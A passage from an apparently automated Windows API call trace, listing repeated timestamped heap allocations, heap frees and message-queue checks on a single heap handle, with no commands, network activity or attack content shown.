lpMem=0x43603a0 | out: hHeap=0x1780000) returned 1 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce3b8 | out: hHeap=0x1780000) returned 1 [0073.058] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b5f8 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43603a0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce338 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43603a0 | out: hHeap=0x1780000) returned 1 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b350 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43603a0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce318 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce318 | out: hHeap=0x1780000) returned 1 [0073.058] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b7d8 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce238 [0073.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b4e0 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43601a8 [0073.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce318 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce318 | out: hHeap=0x1780000) returned 1 [0073.059] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b468 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce318 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360190 | out: hHeap=0x1780000) returned 1 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b300 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360190 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360490 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce328 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360490 | out: hHeap=0x1780000) returned 1 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce328 | out: hHeap=0x1780000) returned 1 [0073.059] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b6e8 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360490 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce348 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360490 | out: hHeap=0x1780000) returned 1 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b710 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360670 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360490 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce378 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360490 | out: hHeap=0x1780000) returned 1 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce378 | out: hHeap=0x1780000) returned 1 [0073.059] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b490 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605b0 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce268 [0073.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43605b0 | out: hHeap=0x1780000) returned 1 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b530 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43606a0 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360430 [0073.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce388 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360430 | out: hHeap=0x1780000) returned 1 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce388 | out: hHeap=0x1780000) returned 1 [0073.060] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b4b8 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605e0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce278 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43605e0 | out: hHeap=0x1780000) returned 1 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b788 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605c8 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360598 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce1d8 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360598 | out: hHeap=0x1780000) returned 1 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce1d8 | out: hHeap=0x1780000) returned 1 [0073.060] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b7b0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360448 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce3b8 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360448 | out: hHeap=0x1780000) returned 1 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b648 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360628 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360400 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce328 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360400 | out: hHeap=0x1780000) returned 1 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce328 | out: hHeap=0x1780000) returned 1 [0073.060] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b378 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360688 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce208 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605e0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604c0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce328 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604c0 | out: hHeap=0x1780000) returned 1 [0073.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce328 | out: hHeap=0x1780000) returned 1 [0073.060] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b3a0 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604a8 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce328 [0073.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604a8 | out: hHeap=0x1780000) returned 1 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b558 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360580 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604f0 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce218 [0073.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce218 | out: hHeap=0x1780000) returned 1 [0073.061] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b620 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605f8 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce358 [0073.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360418 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360508 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce368 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360508 | out: hHeap=0x1780000) returned 1 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce368 | out: hHeap=0x1780000) returned 1 [0073.062] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b440 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360598 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce288 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360598 | out: hHeap=0x1780000) returned 1 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba1c0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360640 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360550 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce388 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360550 | out: hHeap=0x1780000) returned 1 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce388 | out: hHeap=0x1780000) returned 1 [0073.062] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b3c8 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360568 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce368 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360568 | out: hHeap=0x1780000) returned 1 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba230 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360658 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360478 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce378 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360478 | out: hHeap=0x1780000) returned 1 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce378 | out: hHeap=0x1780000) returned 1 [0073.062] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b580 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604f0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce378 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b3f0 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360430 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360610 [0073.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce388 [0073.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360610 | out: hHeap=0x1780000) returned 1 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce388 | out: hHeap=0x1780000) returned 1 [0073.063] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b5a8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360448 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce388 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360448 | out: hHeap=0x1780000) returned 1 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba3b8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43606b8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43606d0 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce1d8 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43606d0 | out: hHeap=0x1780000) returned 1 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce1d8 | out: hHeap=0x1780000) returned 1 [0073.063] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b670 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43606d0 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce1d8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43603e8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360610 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce218 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce228 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360610 | out: hHeap=0x1780000) returned 1 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce228 | out: hHeap=0x1780000) returned 1 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce218 | out: hHeap=0x1780000) returned 1 [0073.063] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b698 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360610 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce218 [0073.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360610 | out: hHeap=0x1780000) returned 1 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba348 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604a8 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360400 [0073.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce228 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360400 | out: hHeap=0x1780000) returned 1 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce228 | out: hHeap=0x1780000) returned 1 [0073.064] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b418 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360400 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce248 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360400 | out: hHeap=0x1780000) returned 1 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17ba4d0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360598 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605b0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce228 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43605b0 | out: hHeap=0x1780000) returned 1 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce228 | out: hHeap=0x1780000) returned 1 [0073.064] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430bc88 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360538 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce228 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430bcb0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360550 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604c0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce4a8 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604c0 | out: hHeap=0x1780000) returned 1 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce4a8 | out: hHeap=0x1780000) returned 1 [0073.064] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b990 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605b0 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce418 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43605b0 | out: hHeap=0x1780000) returned 1 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17b9e40 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360610 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360448 [0073.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce3f8 [0073.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360448 | out: hHeap=0x1780000) returned 1 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce3f8 | out: hHeap=0x1780000) returned 1 [0073.065] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430bb98 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604c0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce448 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604c0 | out: hHeap=0x1780000) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17b9f20 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360400 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605b0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce5a8 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43605b0 | out: hHeap=0x1780000) returned 1 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce5a8 | out: hHeap=0x1780000) returned 1 [0073.065] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430bc38 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43604f0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce598 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43604f0 | out: hHeap=0x1780000) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b8f0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43605b0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360538 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17ce538 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce538 | out: hHeap=0x1780000) returned 1 [0073.065] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b800 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x4360460 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17ce438 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360460 | out: hHeap=0x1780000) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x430b968 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360448 | out: hHeap=0x1780000) returned 1 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17ce4e8 | out: hHeap=0x1780000) returned 1 [0073.065] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360448 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360538 | out: hHeap=0x1780000) returned 1 [0073.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 